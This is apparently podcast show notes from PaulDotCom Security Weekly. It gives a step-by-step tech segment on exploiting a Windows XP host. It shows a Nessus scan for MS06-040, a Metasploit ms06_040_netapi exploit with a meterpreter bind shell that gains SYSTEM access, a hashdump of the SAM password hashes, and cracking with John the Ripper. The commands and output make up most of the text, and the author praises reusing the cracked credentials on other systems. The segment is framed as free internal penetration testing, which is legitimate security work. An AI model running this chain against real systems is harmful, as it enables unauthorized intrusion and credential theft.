Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show
I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U
It reports:
Host is up
Discovered open port netbios-ssn (139/tcp) on
Discovered open port microsoft-ds (445/tcp) on
[i] Plugin 11936 reported a result on port general/tcp of
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of
+ Results found on :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
| Synopsis :
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
| Description :
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
| Solution :
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
| Risk factor :
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:
/framework-3.1/trunk gordon$ ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::=[ msf v3.2-release
+ — –=[ 286 exploits – 124 payloads
+ — –=[ 17 encoders – 6 nops
=[ 62 auxI want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcpI then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST
Here are what my options look like:
msf exploit(ms06_040_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options:
Name Current Setting Required Description
—- ————— ——– ———–
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local portExploit target:
Id Name
— —-
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened ( -> access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::So then I copy and paste those results into my other directory with John The Ripper Installed:
paimei:~/downloads/john- gordon$ cat > hashes.txt
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john- gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session abortedW00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!